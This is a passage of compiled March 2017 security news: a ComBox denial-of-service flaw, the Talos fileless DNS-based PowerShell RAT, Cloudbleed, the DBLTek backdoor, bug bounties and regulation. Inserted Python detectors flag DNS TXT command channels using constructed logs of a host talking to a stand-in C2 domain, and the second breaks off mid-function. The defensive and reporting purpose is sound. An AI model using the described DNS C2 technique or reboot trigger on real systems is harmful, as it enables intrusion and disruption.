Schneider Electric has addressed a denial-of-service (DoS) vulnerability in Conext Combox, a monitoring and communications device for installers and operators of Conext solar systems. The product is used in the energy sector worldwide.

The flaw, reported to the energy giant by Arik Kublanov and Mark Liapustin of Nation-E, can be easily exploited by a remote attacker. Sending three HTTP GET requests in quick succession with an incorrect username and password causes the device to reboot itself.

The security hole, identified as CVE-2017-6019, affects all versions of the firmware for Conext ComBox 865-1058 devices. The issue has been addressed with the release of firmware version 3.03 BN 830.

These are not the only vulnerabilities fixed recently by Schneider Electric and Siemens. The former has patched a high severity credential management weakness in its StruxureWare Data Center Expert software suite, while the latter resolved cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs in its RUGGEDCOM network management system (NMS).


Researchers Uncover Sophisticated, Fileless Attack

4.3.2017 securityweek Virus

Researchers Discover New Non-Malware Obfuscated Targeted Attack

A simple tweet ultimately unraveled a complex, fileless attack. The tweet highlighted encoded text in a PowerShell script that said 'SourceFireSux'. This ultimately led researchers to discover and analyze an attack comprising a malicious Word document and a PowerShell RAT communicating with its C&C servers via unblocked DNS requests. The attack is completely fileless -- non-malware designed to be invisible to standard anti-malware defenses.

SourceFire was acquired by Cisco in 2013 for $2.7 billion. The 'SourceFireSux' reference sparked the interest of researchers at Talos, Cisco's threat intelligence arm, who unsurprisingly wanted to know more. Talos was formed from SourceFire's vulnerability research team together with Cisco's own researchers.

A Talos search for the encoded string uncovered a single sample that had been uploaded to the public malware analysis sandbox, Hybrid Analysis.

A search for the decoded string located a single Pastebin entry uploaded by @JohnLaTwC (Twitter's @JohnLaTwC is John Lambert, general manager, Microsoft Threat Intelligence Center) on Feb. 16, eight days before the tweet. The associated hash led to a malicious Word document that matched the details found in Hybrid Analysis.

Now knowing what they were looking for, Talos was able to locate additional samples and reconstruct and analyze the attack. They found a complex example of the growing tendency for attackers to manipulate existing and trusted Windows facilities rather than install malware that can be detected.

The attack is delivered by a phishing email as a weaponized Word document. The recipient is persuaded to open the document by the assertion, "This document has been secured by McAfee. To view this Protected Document, click Enable Content." Doing so enables a VBA macro which opens PowerShell and loads and unpacks the malicious code without requiring any file to be written to disk.

The script checks for admin status and PowerShell version. Depending on whether it has Administrator or User access, it sets registry entries (HKLM for Admin or HKCU for User) to achieve persistence. If PowerShell is 3.0 or later, the payload is written to an Alternate Data Stream. If it is an earlier version, the payload is encoded and written to the location defined in the registry entries.

The script also contains arrays of domains from which it periodically selects a C2 domain to query. Querying these obtains TXT records containing further PowerShell commands.

PowerShell has effectively become a backdoor that is never written to disk, and the actual process is complex.

"It takes the code received in the DNS query response and defines a string variable which contains the code," explained Talos researchers Edmund Brumaghin and Colin Grady. "It then calls the decode function from the third stage and passes the decoded string into IEX to further extend the Powershell environment. Once this is complete, it then calls a function in the newly extended environment to execute the fourth stage code along with specific parameters. These parameters include the fourth stage C2 domain to use as well as the program to execute which in this case is the Windows Command Line Processor (cmd.exe). This is interesting because it results in the fourth stage payload never actually being written to the filesystem of the infected system."

This is clearly an attack designed to compromise a specific target. Everything discovered by Talos indicates that the discovered samples are recent.

"The domains associated with the Powershell sample that we analyzed from Hybrid Analysis were initially registered on 2017-02-18," note the researchers. "According to data available within Umbrella [a product acquired by Cisco when it purchased OpenDNS], the majority of DNS activity related to the domains used by the powershell sample appears to have occurred between 2017-02-22 and 2017-02-25. There was less activity associated with the other identified sample, with most occurring on 2017-02-11."

Talos was unable to get the C2 infrastructure to issue any commands. The implication is that it is a targeted attack using different C2 domains for individual targets. It would be simple to adjust the lure in the initial phishing email and the hard coded C2 domains for each individual target -- so this could be a brand new attack or an attack only just discovered.

It is, say the researchers, "a great example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting. It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure."
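The researchers' closing point is that DNS inside a corporate network is a C2 channel in its own right. The following is an added example, not Talos code: a Python heuristic run over constructed resolver log lines that flags a client repeatedly fetching TXT records under one domain and receiving long, encoded-looking answers, the polling pattern described above. The log format, domain names and thresholds are assumptions.

```python
"""Heuristic detector for DNS TXT-record command channels.

Added example, not Talos code. It scores per-client, per-domain TXT query
activity in resolver log lines and flags the pattern described above: a
host repeatedly asking for TXT records under one domain and receiving
long, encoded-looking answers. Log format, names and thresholds are assumed.
"""
import base64
from collections import defaultdict

MIN_TXT_QUERIES = 3    # repeated polling, not a one-off SPF/DKIM lookup
MIN_TXT_RATIO = 0.5    # TXT dominates this client's traffic to the domain
MIN_ENCODED_LEN = 40   # short TXT answers are rarely a command payload
_B64_CHARS = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def registered_domain(qname):
    """Collapse a query name to its last two labels.

    Simplification for the example; production code would consult a
    public-suffix list so that e.g. co.uk names are grouped correctly.
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def looks_encoded(rdata):
    """True if a TXT answer is long, uses only base64 characters and decodes."""
    if len(rdata) < MIN_ENCODED_LEN or not set(rdata) <= _B64_CHARS:
        return False
    try:
        base64.b64decode(rdata, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    return True


def parse_line(line):
    """Parse one constructed log line: '<time> <client> <qtype> <qname> <rdata>'."""
    time, client, qtype, qname, rdata = line.split(maxsplit=4)
    return {"time": time, "client": client, "qtype": qtype.upper(),
            "qname": qname.lower(), "rdata": rdata}


def analyse(log_lines):
    """Return one finding per (client, domain) pair whose TXT traffic looks like C2."""
    stats = defaultdict(lambda: {"total": 0, "txt": 0, "names": set(), "encoded": 0})
    for line in log_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        rec = parse_line(line)
        s = stats[(rec["client"], registered_domain(rec["qname"]))]
        s["total"] += 1
        if rec["qtype"] == "TXT":
            s["txt"] += 1
            s["names"].add(rec["qname"])
            if looks_encoded(rec["rdata"]):
                s["encoded"] += 1
    findings = []
    for (client, domain), s in sorted(stats.items()):
        ratio = s["txt"] / s["total"]
        if s["txt"] >= MIN_TXT_QUERIES and ratio >= MIN_TXT_RATIO and s["encoded"] > 0:
            findings.append({"client": client, "domain": domain,
                             "txt_queries": s["txt"], "txt_ratio": ratio,
                             "distinct_names": len(s["names"]),
                             "encoded_answers": s["encoded"]})
    return findings


# Constructed sample text so the TXT answers below are valid base64 of a
# known length; it stands in for the encoded commands described above.
_ENCODED = base64.b64encode(
    b"constructed sample answer standing in for a staged command " * 2).decode()

# Constructed resolver log, not real traffic. 10.0.0.5 shows the suspicious
# pattern; 10.0.0.7 performs ordinary SPF and mail lookups.
SAMPLE_LOG = f"""\
# time client qtype qname rdata
2017-02-22T10:01:02 10.0.0.5 A www.example.com 93.184.216.34
2017-02-22T10:01:05 10.0.0.5 TXT a1f3.stage-c2.test {_ENCODED}
2017-02-22T10:06:05 10.0.0.5 TXT b7c0.stage-c2.test {_ENCODED}
2017-02-22T10:11:05 10.0.0.5 TXT 9e2d.stage-c2.test {_ENCODED}
2017-02-22T10:16:05 10.0.0.5 TXT 4412.stage-c2.test {_ENCODED}
2017-02-22T10:02:00 10.0.0.7 TXT example.com v=spf1 include:_spf.example.net -all
2017-02-22T10:02:01 10.0.0.7 A mail.example.com 93.184.216.35
2017-02-22T10:03:00 10.0.0.7 MX example.com mail.example.com
""".splitlines()


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Legitimate TXT users such as SPF and DKIM lookups stay below the query-count and encoding thresholds, which is why the ratio and decode checks are combined rather than alerting on TXT alone.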


Vulnerable Services Emulator Released for Metasploit

4.3.2017 securityweek Vulnerability
A new tool that can emulate vulnerable services and help researchers get more from the Metasploit penetration testing platform is now available in open source.

Designed to help security researchers understand security from the attacker’s perspective, Metasploit’s main issue was that it was rather difficult to use without vulnerable services at hand. Vulnerable OS images (Metasploitable2 and Metasploitable3) have previously been available, but they weren’t enough, as only a “small subset of the thousands of Metasploit modules available for users” was included in them.

Available on GitHub, the Vulnerable Services Emulator comes to solve that problem, Jin Qian notes in a blog post. It has been designed as a framework that allows researchers to easily emulate vulnerable services for penetration testing purposes.

“Right now, it emulates over 100 vulnerable services, covering things like compromising credentials, getting a shell from the victim, and more. After going through module exercises, users can learn details about security vulnerabilities and how to test them, and are encouraged to continue to learn and play with Metasploit’s capabilities,” Qian explains.

The tool, he says, is very easy to install and use, as all that it requires is a working Perl installation for Windows, Mac or Linux. Moreover, the emulator was designed to be language independent, with the service emulation in JSON format. Thus, anyone can quickly add, remove, or edit a service in JSON.

One thing that users should keep in mind when running the emulator, however, is that “the commands typed on the shell session spawned are actually executed on the target.” Anyone using the emulator should run it in a safe environment to avoid any issues.

The Vulnerable Services Emulator was meant to help IT professionals and engineers easily test Metasploit modules, as well as to get training on Metasploit. At the moment, the tool includes support for over 100 emulated vulnerable services, but work is being done to add “as many of the 1000+ modules in Metasploit as possible.”

“At the core of the project, we implemented a framework (an interpreter) to execute the JSON based service description file. The current implementation is in Perl, but you can implement the framework in other programming languages of your choice,” Qian notes. Additional technical details on the tool are available on the project’s page on GitHub.


Google Offers $31,337 for RCE Vulnerabilities

3.3.2017 securityweek Vulnerability

Google informed bug bounty hunters on Thursday that it has made some changes to its Vulnerability Rewards Program (VRP), including offering more money for certain types of flaws.

Until now, the tech giant had offered $20,000 for remote code execution (RCE) vulnerabilities and $10,000 for unrestricted file system or database access issues. The rewards have now increased to $31,337 and $13,337, respectively.

Researchers can earn $31,337 if they find command injections, sandbox escapes and deserialization bugs in highly sensitive applications, such as Google Search, Accounts, Wallet, Inbox, Code Hosting, Chrome Web Store, App Engine, Google Play, and Chromium Bug Tracker. If the flaws affect non-integrated acquisitions or apps that have a lower priority, the maximum reward is $5,000.

The unrestricted file system or database access category includes unsandboxed XXE and SQL injection vulnerabilities. These types of flaws can earn bounty hunters up to $13,337 if they affect highly sensitive services.

Google also announced that rewards attributed to vulnerability reports from its internal web security scanner will be donated; $8,000 has been donated this year to rescue.org.

The company reported in late January that it has paid out more than $9 million since the launch of its bug bounty program in 2010, including $3 million awarded last year. More than $400,000 of the total amount paid out in 2016 represented rewards that exceeded $20,000, including a single reward of $100,000.

A survey conducted by Google among its top researchers showed that, in 2016, 57 percent of them looked for vulnerabilities a few times a month, nearly 24 percent looked rarely or never, and 19 percent put their skills to work almost every day. Half of the respondents said they sometimes found flaws, while 16.7 percent said they almost always found flaws. One-third of respondents said they very rarely or never discovered bugs.

The highest numbers of researchers paid in 2016 were based in China, the United States and India.

Highest paid researchers


Backdoor Found in DBLTek GSM Gateways

3.3.2017 securityweek Mobil

Researchers at Trustwave have identified a backdoor in GSM gateways manufactured by Hong Kong-based voice over IP (VoIP) solutions provider DBL Technology.

The company’s DBLTek GoIP devices are designed to bridge GSM and IP networks. DBL Technology has been around for more than 10 years and its products are available worldwide.

In addition to a management web interface, GoIP devices have a telnet-accessible command-line interface. This telnet interface can be accessed using one of two accounts (“ctlcmd” and “limitsh”) protected by a user-set password.

While these accounts can be used to obtain limited information about the device via telnet, experts also discovered an undocumented account, named “dbladm,” which provides root-level shell access to the gateway. The problem is that this account is not protected by a password, but a challenge-response authentication mechanism that can be easily defeated.

When a user attempts to log in to this account, they are presented with a “challenge” number, which they must solve to obtain the password. Trustwave reverse engineered the authentication scheme and determined that there are only five steps to solving it. This includes adding a number to the initial challenge, shifting bits, and generating an MD5 hash.

DBLTek GoIP login challenge

“It is highly likely that this authentication scheme is the result of a testing mechanism built into the '/sbin/login' binary to permit DblTek engineers to login to devices without having to authenticate for devices running on the local network,” Trustwave researchers said.

The backdoor account is present on GoIP devices with 1, 4, 8, 16 and 32 SIM card ports. Experts believe the vulnerability could also affect other products developed by the company.

Trustwave made the first attempt to contact the vendor in October 2016, but it only received a response in December. A firmware update was released on December 21, but experts determined that instead of properly addressing the issue, DBL simply made the challenge more complex.

“It seems DblTek engineers did not understand that the issue is the presence of a flawed challenge response mechanism and not the difficulty of reverse engineering it,” experts said.

SecurityWeek has reached out to DBL Technology for comment and will update this article if the company responds.


New Financial Regulation Forces Cyber Security into the Board Room

3.3.2017 securityweek Cyber
The New York State Department of Financial Services (DFS) 'first-in-the-nation' cybersecurity regulation for the financial services industry is, as of 1 March 2017, operational. One of the most highly regulated industries is now even more regulated in New York.

"New York is the financial capital of the world, and it is critical that we do everything in our power to protect consumers and our financial system from the ever-increasing threat of cyber-attacks," Governor Cuomo said. "These strong, first-in-the-nation protections will help ensure this industry has the necessary safeguards in place in order to protect themselves and the New Yorkers they serve from the serious economic harm caused by these devastating cyber-crimes."

The purpose of the regulation (PDF) is to provide 'certain regulatory minimum standards' while at the same time "not being overly prescriptive so that cybersecurity programs can match the relevant risks and keep pace with technological advances." This is a difficult line it seeks to follow by allowing the regulated entities to define the requirements according to their own risk assessments.

In regulatory terms, there is a potential weakness in that no controlling risk framework is defined on which to base those risk assessments -- leaving individual entities some scope to define the baseline for their own conformance. The NIST Cybersecurity Framework would be an obvious candidate -- but NIST is large and complex. "The NIST framework is extremely comprehensive, and for medium or small organizations, the burden of implementation wouldn't be feasible," comments Tim Erlin, senior director of IT security and risk strategist for Tripwire.

This leaves ambiguities in conformance. An example can be found in section 500.05 (Penetration Testing and Vulnerability Assessments). It states, "The cybersecurity program for each Covered Entity shall include monitoring and testing, developed in accordance with the Covered Entity's Risk Assessment, designed to assess the effectiveness of the Covered Entity's cybersecurity program." In short, the regulated organizations can choose between "effective continuous monitoring", and annual penetration testing with "bi-annual vulnerability assessments".

It could be argued that cyber security requires all of those. The most effective at finding vulnerabilities is perhaps the most expensive: penetration testing; but this provides only a slice-in-time. Annual pentesting would leave perhaps eleven months in which vulnerabilities could go untested -- and hence the bi-annual vulnerability scanning or continuous monitoring. What isn't defined, however, is what should happen with the results of the testing.

Consider the views of professional pentesters. A recent survey found that only 10% of pentesters "saw full remediation of all identified vulnerabilities." Almost a third of the pentesters felt they were employed for compliance purposes only. This is a danger for all regulations, and especially those that attempt to be 'not overly prescriptive': the more leeway offered to the regulated entities, the more likely it is that cyber security becomes conformance box-checking rather than security fulfilment.

The authors of the new regulation are not unaware of this problem, and have sought to limit it by requiring the regulated entities to provide an annual 'certificate of compliance' to the superintendent of financial services. This includes, "To the extent a Covered Entity has identified areas, systems or processes that require material improvement, updating or redesign, the Covered Entity shall document the identification and the remedial efforts planned and underway to address such areas, systems or processes."

The certificate requires that the board or senior officers have "reviewed documents, reports, certifications and opinions of such officers, employees, representatives, outside vendors and other individuals or entities as necessary." Furthermore, the statement must be "Signed by the Chairperson of the Board of Directors or Senior Officer(s)."

In short, the new regulation provides the regulated industries with a degree of compliance wiggle room by not being overly prescriptive, but then insists that responsibility for any wiggle is taken at the highest level. Any regulated industry that decides to wiggle will need to justify that wiggle; and since this is signed by the chairman of the board, there is no hiding place for any officer. This is perhaps the real innovation in this regulation, and one that might well be copied by other regulatory bodies in the future. This simple requirement could have a greater effect on moving cyber security into the boardroom than any other form of non-intrusive evolution.


Microsoft Temporarily Doubles Bounty Payouts for Online Services Bugs

3.3.2017 securityweek Security
For the next two months, developers who report vulnerabilities as part of Microsoft’s Online Services bounty program will receive doubled rewards for their work, the company announced.

Starting on March 1, 2017 until May 1, 2017, eligible vulnerability discoveries submitted for Microsoft Office 365 Portal and Microsoft Exchange Online will be rewarded twice as much as before.

Developers interested in getting the double rewards should be looking for vulnerabilities in six of the company’s domains: portal.office.com, outlook.office365.com, outlook.office.com, *.outlook.com, and outlook.com.

Microsoft launched the Online Services Bug Bounty program in September 2014, and expanded it in April 2015 and August 2015 to add various Azure and Office 365 properties. Last year, the company added OneDrive to the program.

The company would normally pay between $500 and $15,000 for vulnerabilities in the online services, but bugs submitted during March and April can bring payments between $1,000 and $30,000. All of the vulnerabilities listed in the Online Services Bug Bounty Terms are eligible for the increased bounties.

On its Online Services Bug Bounty portal, Microsoft lists as eligible submissions the following types of vulnerabilities: Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Unauthorized cross-tenant data tampering or access (for multi-tenant services), Insecure direct object references, Injection Vulnerabilities, Authentication Vulnerabilities, Server-side Code Execution, Privilege Escalation, Significant Security Misconfiguration (when not caused by user).

“We realize the desire of researchers and customers to security test our services to ensure they can trust us and our solutions. We also believe that if a researcher informs us of a security flaw in our Office 365 services, they should be awarded for protecting us. These discoveries along with our internal security testing efforts contribute to keeping our users safe,” Akila Srinivasan and Travis Rhodes, Microsoft Security Response Center, note in a blog post.


Next Windows 10 Release Brings Improved Control of Updates, Privacy

3.3.2017 securityweek IT
Windows 10 Creators Update, the platform iteration expected to arrive next month, will provide users with improved control over software updates and privacy settings, Microsoft says.

Following the upcoming changes, updates will be less likely to be installed at an inopportune time and downloads will have a lower impact on user experience in Creators Update, courtesy of an enhanced update deployment experience. Furthermore, users will benefit from new privacy and diagnostic data collection settings, while also getting increased control over such settings through the web-based privacy dashboard the company launched in January.

In a blog post, John Cable, Director of Program Management within the Windows Servicing and Delivery (WSD) team, says that the upcoming improvements are based on the feedback Microsoft received from users via channels such as the Feedback Hub application, social media, and Windows forums.

One of the most important changes will impact the manner in which updates are installed, something that users can’t control at all at the moment. Right now, Windows 10 doesn’t provide options that users can tailor in line with their needs, while also impacting their experience with unexpected reboots that could also prove disruptive if they happen at the wrong time.

Windows 10 Creators Update, however, should change that by delivering several options for scheduling the timing of when updates install. Thus, users can specify exactly when an update should occur, can even reschedule an update when needed, and can even “snooze” the update notification to postpone the moment when they have to deal with it. According to Cable, users will be able to use the “snooze” capability to pause the update process for three days.

The “Active Hours” schedule will also be updated, so that Windows won’t end up installing an update at times when the user would actually want the device to be ready to use. The same as before, however, users will also be able to restart the device to immediately install the update.

“As always, we believe in the value of keeping devices ‘up to date,’ and recommend that you choose the installation defaults that Windows 10 provides so you will always have the latest features, apps, and security updates. However, when you need more control over the update experience, you will have new choices,” Cable notes.

He also explains that additional control over the update process will be available when clicking on a new icon on the Windows Update Settings page, which will allow users to verify whether their device is up to date or not. The new update experience, Cable says, has been available for users in the Windows Insider program for some time and has received positive reactions so far.

Before existing computers will be updated to Windows 10 Creators Update, users will be asked if they want to review their privacy settings, Cable says. Screenshots detailing the process have been published via a “quest” in the Feedback Hub application. “This feedback will help us iterate on this experience as we get closer to shipping the Creators Update,” Cable says.

Users who choose to review their privacy settings will access options related to location, speech recognition, diagnostics, and ads. They can also choose whether Microsoft should use diagnostics data to make recommendations regarding Microsoft products and services. A “Learn more” button will allow users to access additional information on these options, on how Windows Defender SmartScreen works, and on the related data transfers and uses.

Last year, Microsoft had to bring clarifications regarding its collection of user data, especially with France serving the software giant a notice to stop collecting excessive data or tracking browsing without consent from users.

The upcoming Windows 10 Creators Update is also expected to provide users with new options to improve their overall security. One of these options should block the installation of applications that are not distributed via the Microsoft Store. Essentially, it would block Win32 applications from being installed, thus preventing malware from infecting Windows 10 machines.


Google Expands Safe Browsing Protection on macOS

3.3.2017 securityweek Apple
Google announced this week that it will expand Safe Browsing on macOS in an effort to protect Chrome users against unwanted ad injections and unauthorized settings changes.

“Safe Browsing is broadening its protection of macOS devices, enabling safer browsing experiences by improving defenses against unwanted software and malware targeting macOS,” Google’s Kylie McRoberts and Ryan Rasti said on the company’s Security Blog. “As a result, macOS users may start seeing more warnings when they navigate to dangerous sites or download dangerous files.”

Applications that inject ads violate Google’s unwanted software policy and Mac users will be warned when Chrome detects such activity.

Safe Browsing warning on MacOS

As for Chrome settings, the tech giant wants to ensure that applications cannot make unauthorized changes to the start page, the home page and the default search engine.

Google recently launched a new Mac API called Settings Overrides, which allows Chrome extensions to override the start page, home page and search settings in the web browser. The company wants this API to be the only approved method for making changes to Chrome settings on macOS and OS X.

However, only extensions approved for the Chrome Web Store are allowed to use the Settings Overrides API. Starting March 31, Chrome will display a warning when a piece of software attempts to modify settings via other methods.


HackerOne Offers Free Service to Open Source Projects

3.3.2017 securityweek Security
Bug bounty platform provider HackerOne announced on Thursday that open source projects can benefit from its Professional services at no cost if they can meet certain conditions.

HackerOne, which recently raised $40 million in a Series C financing round, already hosts bug bounty programs for 36 open source projects, including GitLab, Ruby, Rails, Phabricator, Sentry, Discourse, Brave and Django. To date, these projects have resolved more than 1,200 vulnerabilities.

The company hopes to have other open source projects sign up for its services now that it has launched its Community Edition program.

Through the new program, open source applications can use HackerOne’s Pro service for free. The service provides the mechanisms necessary for vulnerability submissions, coordination, analytics, detecting duplicates, and paying out bounties.

It’s worth pointing out that while open source projects can benefit from this offer at no cost, HackerOne will still charge the usual 20 percent payment processing fee in the case of programs that pay out cash bounties.

A project is eligible for the offer if it’s covered by an Open Source Initiative (OSI) license, and it has been active for at least 3 months. Accepted projects are required to add a “SECURITY.md” file to their project root to provide details on submitting vulnerabilities, advertise the bug bounty program on their website, and commit to responding to new bug reports within a week.

“Our HackerOne program has been a definite success for us – a new way to get actionable security reports that improve the security of the open source Discourse project for everyone,” said Jeff Atwood, co-founder of Discourse. “A public bounty program is an essential element of the defense in depth philosophy that underpins all security efforts.”

HackerOne and Synack have been awarded a combined $7 million to help the U.S. Department of Justice and its components run bug bounty initiatives. One of these initiatives is Hack the Army, which received over 100 eligible vulnerability reports and paid out roughly $100,000 to participants.


Number of hacker attacks on Russia tripled last year

3.3.2017 Novinky/Bezpečnost Computer attack
The number of attempted cyber attacks on Russian information systems rose last year to 52.5 million, more than three times the previous year's figure. Nikolai Patrushev, head of Russia's Security Council, said this on Friday at a conference in Kurgan in the southern Urals.
"In 2015 there were only 14.4 million cases," Patrushev said. He pointed out that the security system is not capable of defending against most existing threats.

The hackers' goal is to disrupt the functioning of the Russian internet or to obtain classified information, among other means with the help of attack viruses, Patrushev said. The effectiveness of the security system against cyber attacks is also reduced by unauthorized internet connections, the low qualification of users and the use of foreign information technology.


Cloudflare tries to downplay the impact of the Cloudbleed incident
3.3.2017 securityaffairs Incident

According to Cloudflare, an initial analysis conducted by its experts reveals that no personal data was leaked due to the Cloudbleed issue.
On February 17 the Google Project Zero researcher Tavis Ormandy disclosed a serious bug in Cloudflare infrastructure, so-called Cloudbleed.

Ormandy discovered that Cloudflare was leaking a wide range of sensitive information, including authentication cookies and login credentials.

“On February 17th 2017, I was working on a corpus distillation project, when I encountered some data that didn’t match what I had been expecting. It’s not unusual to find garbage, corrupt data, mislabeled data or just crazy non-conforming data…but the format of the data this time was confusing enough that I spent some time trying to debug what had gone wrong, wondering if it was a bug in my code. In fact, the data was bizarre enough that some colleagues around the Project Zero office even got intrigued.” Ormandy wrote in a security advisory. “We fetched a few live samples, and we observed encryption keys, cookies, passwords, chunks of POST data and even HTTPS requests for other major cloudflare-hosted sites from other users. Once we understood what we were seeing and the implications, we immediately stopped and contacted cloudflare security.”

Tavis Ormandy (@taviso) tweeted on 24 Feb 2017: "Cloudflare have been leaking customer HTTPS sessions for months. Uber, 1Password, FitBit, OKCupid, etc. https://bugs.chromium.org/p/project-zero/issues/detail?id=1139"
The flaw was introduced in September 2016, but it had the greatest impact between February 13 and February 18, when one in every 3.3 million requests going through Cloudflare’s systems may have resulted in memory leakage. The bug itself was addressed within hours, but it took several days to contain the incident due to the fact that leaked data had been cached by search engines.

Cloudflare co-founder and CEO Matthew Prince published a detailed blog post to analyze this “extremely serious bug” with a potentially massive impact.

The experts at Cloudflare analyzed the server logs and found no evidence of malicious exploitation, concluding that the vast majority of customers were not impacted.

“Given that the data that leaked was random on a per request basis, most requests would return nothing interesting. But, every once in a while, the data that leaked may return something of interest to a hacker.” reads the analysis published by Cloudflare.


“If a hacker were aware of the bug before it was patched and trying to exploit it then the best way for them to do so would be to send as many requests as possible to a page that contained the set of conditions that would trigger the bug. They could then record the results. Most of what they would get would be useless, but some would contain very sensitive information.” the post continues.

“The nightmare scenario we have been worried about is if a hacker had been aware of the bug and had been quietly mining data before we were notified by Google’s Project Zero team and were able to patch it.”

The Cloudbleed bug was triggered more than 1.2 million times across the 6,500 sites potentially exposed to the issue.

According to the experts, every time customer data is present, the company reaches out to the customer to share the data that it has discovered and provides the necessary support to mitigate any impact of the accidental exposure.

“Generally, if customer data was exposed, invalidating session cookies and rolling any internal authorization tokens is the best advice to mitigate the largest potential risk based on our investigation so far.” reads the Cloudflare post.

Users who are concerned that their data may have been exposed by Cloudbleed are invited to take a look at the list of potentially affected websites; meanwhile, the experts at Cloudflare are still investigating the incident. Ormandy believes the company downplayed the risk.

“It is not correct to conclude that no passwords, credit cards, health records, social security numbers, or customer encryption keys were ever exposed,” Prince added. “However, if there was any exposure, based on the data we’ve reviewed, it does not appear to have been widespread. We have also not had any confirmed reports of third parties discovering any of these sensitive data types on any cached pages.”

Researchers at Cloudflare have seen approximately 150 customers’ data on the more than 80,000 cached pages they have purged from search engine caches.


Talos team spotted a PowerShell malware that uses DNS queries to contact the C2

3.3.2017 securityaffairs Virus

Researchers from Cisco Talos team spotted a new strain of malware that leverages PowerShell scripts to fetch commands from DNS TXT records.
Malware researchers at Cisco Talos have published a detailed analysis on a targeted attack leveraging a weaponized Microsoft Word document that is spread in spam emails as an attachment.

The malicious code used in the attack is based on Windows PowerShell scripts; the RAT communicates with the C&C infrastructure through the Domain Name Service (DNS).

The attackers used DNS as the communication channel because DNS requests are almost never blocked on corporate networks.

The malicious code was first spotted by the security researcher @simpo13, who reported his discovery to the Talos team because he noticed that the code references Cisco’s SourceFire security appliances with the encoded text “SourceFireSux.”

simpo (@Simpo13) tweeted on 24 Feb 2017: "Welp, someone doesn't like SourceFire"

The attackers used a social engineering trick to lure victims into opening the malicious Word document.

“Interestingly, the Word document was made to appear as if it were associated with a secure email service that is secured by McAfee.” reads the blog post published by Talos. “This is likely an effective way to increase the odds of the victim opening the file and enabling macros as McAfee is a well known security vendor and likely immediately trusted by the victim. The document informs the user that it is secured and instructs the user to enable content.”

When the victim opens the document, the multiple-stage infection starts with the execution of a Visual Basic for Applications (VBA) macro that launches PowerShell commands to install the backdoor on the machine.

“The hash listed in the Pastebin led us to a malicious Word document that had also been uploaded to a public sandbox,” continues the Talos team. “The Word document initiated the same multiple-stage infection process as the file from the Hybrid Analysis report we previously discovered, and allowed us to reconstruct a more complete infection process.”

The VBA script unpacks a compressed and obfuscated second-stage PowerShell script, which determines the PowerShell version installed on the system, adds entries to the Windows Registry and starts a third stage, a PowerShell script that acts as a backdoor.

If the user has administrative access, the installer PowerShell script also adds the backdoor to the Windows Management Instrumentation (WMI) database so that it persists on the infected system across reboots.

Once the backdoor is established, in stage 4 of the attack the malicious code periodically makes DNS requests to one of the domains hard-coded into the script.

The requests retrieve TXT records from the domain that contain PowerShell commands, which the infected system executes directly. It is important to notice that the code is retrieved through DNS requests but never written to the local file system. This “fourth stage” script is the actual remote control tool used by the attacker. “Stage 4 is responsible for querying the C2 servers via DNS TXT message requests to ask what commands to execute,” Edmund Brumaghin told Ars via e-mail. “If a command is received, it is then executed and the output or results of the command are communicated back to the C2 server. This basically gives the attacker the ability to execute any Windows or application commands available on the infected host.”

“Once this is completed, the STDOUT and STDERR output that was captured from the Windows Command Line processor earlier in Stage 4 is transmitted using a “MSG” message. This allows the attacker to send commands to be executed directly by the Command Processor and receive the output of those commands all using DNS TXT requests and responses.” reads the analysis. “This communication is described in greater detail in the following section. Below is the DNS analysis and contents of the query request sent from an infected system to the C2 server.”

The experts were not able to analyze the C2 infrastructure. The attack highlights the importance of inspecting every network protocol, not only the usual ones, to avoid such problems.

“This malware sample is a great example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting.” concludes the Talos team. “It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure.”
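As an added example (not from the Talos report), here is a detector for the stage-4 behaviour described above when run over a resolver log: a host making repeated TXT lookups against one domain inside a short window, with long encoded labels in the query names where the "MSG" output would travel. The log format, the client addresses and the domain `example-c2.invalid` are constructed.

```python
"""Detect DNS TXT queries used as a command channel, in the style of the
stage-4 behaviour described above: repeated TXT lookups against one domain
and command output encoded into long query-name labels.

Added example, not from the Talos report. The resolver log format, the
client addresses and the domain example-c2.invalid are all constructed.
"""
import math
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed resolver log: "<ISO timestamp> <client IP> <query type> <query name>".
# 10.0.0.5 behaves like the backdoor (periodic TXT lookups, then TXT queries whose
# leading labels carry a hex-encoded blob); 10.0.0.7 does ordinary SPF/DMARC lookups.
SAMPLE_LOG = """\
2017-02-24T09:00:00 10.0.0.5 A www.example.com
2017-02-24T09:00:01 10.0.0.5 TXT example-c2.invalid
2017-02-24T09:00:31 10.0.0.5 TXT example-c2.invalid
2017-02-24T09:01:01 10.0.0.5 TXT example-c2.invalid
2017-02-24T09:01:02 10.0.0.5 TXT msg.4a6b7b2e5c3d9f1a8e7b6c5d4e3f2a1b0c9d8e7f.example-c2.invalid
2017-02-24T09:01:03 10.0.0.5 TXT msg.9f8e7d6c5b4a3f2e1d0c9b8a7f6e5d4c3b2a1f0e.example-c2.invalid
2017-02-24T09:01:31 10.0.0.5 TXT example-c2.invalid
2017-02-24T09:00:10 10.0.0.7 TXT _dmarc.example.com
2017-02-24T09:00:12 10.0.0.7 TXT example.com
2017-02-24T09:00:15 10.0.0.7 A mail.example.com
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_line(line):
    """Return (timestamp, client, qtype, qname) or None for an unparsable line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, qtype, qname = m.groups()
    return datetime.fromisoformat(ts), client, qtype.upper(), qname.rstrip(".").lower()


def base_domain(qname):
    """Naive registrable-domain guess (last two labels); enough for this sample."""
    labels = qname.split(".")
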